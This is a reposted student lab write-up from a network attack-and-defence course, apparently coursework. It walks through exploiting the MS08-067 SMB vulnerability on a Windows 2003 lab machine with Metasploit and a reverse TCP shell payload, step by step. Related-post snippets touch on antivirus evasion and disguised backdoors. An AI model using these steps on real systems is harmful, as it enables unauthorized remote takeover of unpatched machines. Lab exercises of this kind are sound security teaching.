20145335郝昊《网络攻防》Exp5 MS08_067漏洞测试

最新推荐文章于 2017-05-12 19:17:00 发布
最新推荐文章于 2017-05-12 19:17:00 发布
阅读量129 收藏
点赞数
原文链接:http://www.cnblogs.com/20145335hh/p/6697635.html
版权

20145335郝昊《网络攻防》Exp5 MS08_067漏洞测试

实验内容

  • 了解掌握metasploit平台的一些基本操作,能学会利用已知信息完成简单的渗透操作。

  • 漏洞MS08_067:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏洞,可被利用实施远程代码执行.

  • 漏洞威胁:能远程主动发起对漏洞主机端口的扫描,并且能直接获得漏洞主机的系统权限,属于最高严重级别的漏洞。

  • 使用的主机:kali:192.168.199.129windows 2003 :192.168.199.223
    884698-20170412093257579-1609904592.png
    884698-20170412093309563-540795816.png

实验步骤

  • 使用命令msfconsole进入控制台,可以使用search ms08_067查看相关信息。

884698-20170412093106094-394944157.png

  • 得到相应模块名之后,我们使用该模块,使用 show payloads ,确定攻击载荷。

884698-20170412093120688-1762639996.png

  • 之后使用命令 use exploit/windows/smb/ms08_067_netapi

  • set payload generic/shell_reverse_tcp选择playoad,并查看相关信息。

884698-20170412093132891-1790204197.png

  • 使用命令show options确定,之后按照显示出的信息进行修改,我们需要设置好监听ip,监听端口以及攻击Ip(这里需要利用RPC请求发起攻击,所以RPORT设置为445不需要修改)

884698-20170412093144547-1852468463.png

  • 我们可以通过修改target的值,来选择我们具体想要攻击的计算机系统(通常可以采用自动选取,即target设置为0)

884698-20170412093157547-862669694.png

  • 使用命令exploit发起攻击,实验结果如下图

884698-20170412093209047-1800936026.png

  • 使用ipconfig命令查看

884698-20170412093219407-103989228.png

  • 创建文件夹

884698-20170412093231922-1943525095.png
884698-20170412093242594-1960499358.png

转载于:https://www.cnblogs.com/20145335hh/p/6697635.html

weixin_30788731
关注
DIG:Dive into Graphs是用于图深度学习研究的交钥匙库。-Python开发
05-25
DIG:用于图深度学习研究的总库,刘萌*,罗有志*,王丽梅*,谢耀辰*,郝昊*,桂树瑞,赵旭,余海阳,张静屯,刘毅,严克强,宝拉·奥兹特金(Bora Oztekin),刘浩然(Haoran Liu),张璇,丛聪(Cong Fu)和姬水旺...
20145335郝昊网络攻防》Exp4 MS11_050
weixin_30896763的博客
04-12 134
20145335郝昊网络攻防》Exp4 MS11_050 实验内容 初步掌握平台matesploit的使用 了解漏洞MS11_050漏洞:use-after-free漏洞,即对象被释放之后,对应指针并没有被置为NULL,被释放的内存中的数据可能会被其他对象的函数非法调用 影响范围:IE7 和IE 8 其他的版本好像并不存在这个漏洞。 实验步骤 使用命令msfconsole命令进入控制台 使...
20145335郝昊网络攻防》Exp4 Adobe阅读器漏洞攻击
weixin_30412577的博客
04-12 139
20145335郝昊网络攻防》Exp4 Adobe阅读器漏洞攻击 实验内容 初步掌握平台matesploit的使用 有了初步完成渗透操作的思路 本次攻击对象为:windows xp sp3 / Adobe 9.3 主机为kali的ip地址为:192.168.199.220、靶机windows xp 的ip地址为:192.168.199.137 实验步骤 使用命令msfconsole进入...
20145335郝昊网络攻防》Exp9 Web安全基础实践
weixin_30709061的博客
05-12 136
20145335郝昊网络攻防》Exp9 Web安全基础实践 实验内容 理解常用网络攻击技术的基本原理。 完成WebGoat实践下相关实验 实验步骤 XSS注入攻击 Phishing with XSS 这个XSS攻击比较简单,需要的是在网页的文本框里写一个钓鱼网站,仔细读给的题目就可以分析出来(但是英语四级没过的我很伤=_=) </form> <script&g...
20145335郝昊网络攻防》Exp 4 利用nmap扫描
weixin_30284355的博客
04-12 125
20145335郝昊网络攻防》Exp 4 利用nmap扫描 实验原理 使用msf辅助模块,nmap来扫描发现局域网中的主机ip 实验步骤 首先使用命令创建一个msf所需的数据库 service postgresql start msfdb start 之后使用命令msfconsole开启msf 输入命令 use auxiliary/scanner/discovery...
20145335郝昊网络攻防》Exp7 网络欺诈技术防范
weixin_30594001的博客
04-25 146
20145335郝昊网络攻防》Exp7 网络欺诈技术防范 实验内容 本次实践本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。 简单应用SET工具建立冒名网站。 利用软件ettercap DNS spoof,实现dns欺骗。 实验步骤 URL攻击实验 首先确认kali主机和靶机在同一网段,且能相互ping通。 为了使得apache开启后,靶机通过IP地址能直接访问...
20145335郝昊网络攻防》———免杀原理与实践
weixin_30904593的博客
03-22 116
20145335郝昊网络攻防》———免杀原理与实践 实验内容 理解免杀技术及其原理,深入理解课堂老师所讲内容; 正确使用msf编辑器(即实验二中后门程序所用编辑器),veil-evasion,自己利用shellcode编程等免杀技巧来完成实验; 正确通过组合应用各种技术实现恶意带代码免杀,避免360安全卫士或各种杀毒软件的查杀。 若完成免杀实验并且成功,将其连回kali虚拟机下进行验证后门木马...
20145335郝昊网络攻防》恶意代码分析
weixin_30872789的博客
03-29 140
20145335郝昊网络攻防》恶意代码分析 实验内容 恶意代码的免杀和恶意代码的分析是相互对立的也是相互依托的,当对电脑中的恶意代码进行分析的过程,也就是对于恶意代码逃避查杀的过程,而恶意代码免杀也就是对于恶意代码的分析之后的结果,是否可以逃避查杀或者不能逃避查杀。 本次实验用到了计算机病毒课上老师使用的一些软件,来分析和判断恶意代码的行为。 实验过程 利用计划任务分析 每间隔3分钟对记录...
20145335郝昊网络攻防》恶意代码伪装的技术实践
weixin_30733003的博客
03-27 124
20145335郝昊网络攻防》恶意代码伪装的技术实践 实验内容 将程序后门木马软件进行包装,既绿色化,将木马程序进行伪装,比如其他.exe文件。 通过之气的实验手动编译一个后门程序,在原本的后门程序代码中加入对原木马程序主文件的调用,打开正常的程序。就可以实现隐蔽的后门,这样可以诱导使用者打开后门软件却不知道。 实验步骤 首先需要对于之前的代码的主函数进行修改 注意需要将后门程序在编译的...
20145335郝昊《网络对抗》Exp 8 Web基础
weixin_30527551的博客
05-07 120
20145335郝昊《网络对抗》Exp 8 Web基础 实验内容 本实践的具体要求有: Web前端HTML;能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。 Web前端javascipt:理解JavaScript的基本功能,理解DOM。编写JavaScript验证用户名、密码的规则。 Web后端:MySQL基础:正常安装、启动MySQL...
weixin286基于SSM框架的童装购买平台微信小程序+ssm.rar
09-13
所有源码,都可正常运行
基于Spring框架的Java Web文章CRUD应用.zip
最新发布
09-13
这是一个基于Spring框架的Java Web应用程序,用于实现文章的增删改查(CRUD)操作。程序集成了JSF前端技术和JPA数据访问层,通过Hibernate实现。PostgreSQl被用作数据库系统。在使用此项目之前,需在__applicationContext.xml__文件中设置数据库的用户名和密码。该项目文件位于src/main/webapp/WEB-INF/文件夹中。该项目使用Maven管理依赖关系、构建源代码和打包应用程序。通过在项目文件夹中打开终端并执行以下命令,可以完成所有这些操作:mvn clean package。该项目使用Tomcat作为应用程序服务器,要运行服务器,请在项目文件夹中打开终端并执行:sh target/bin/webapp。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看reADME.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
springboot基于Android的酒店预订系统App毕业论文.docx
09-13
springboot基于Android的酒店预订系统App毕业论文.docx
weixin271松江大学城就餐推荐系统设计与实现+ssm.rar
09-13
所有源码,都可正常运行
基于java的保密信息学科平台系统设计与实现.docx
09-13
基于java的保密信息学科平台系统设计与实现.docx
基于java的图书电子商务网站的设计与实现.docx
09-13
基于java的图书电子商务网站的设计与实现.docx
基于java的新闻稿件管理系统设计与实现.docx
09-13
基于java的新闻稿件管理系统设计与实现.docx
基于java的数码论坛系统设计与实现设计与实现.docx
09-13
基于java的数码论坛系统设计与实现设计与实现.docx
强化学习与模糊逻辑结合的异构蜂窝网络容量与覆盖优化
"这篇论文探讨了在异构蜂窝网络中,如何通过基于FQLC(模糊逻辑与Q学习算法的融合)的自优化控制系统解决微蜂窝密集部署带来的容量与覆盖问题。研究背景是4G/5G时代,随着网络密度增加,微蜂窝部署的不规则性对网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值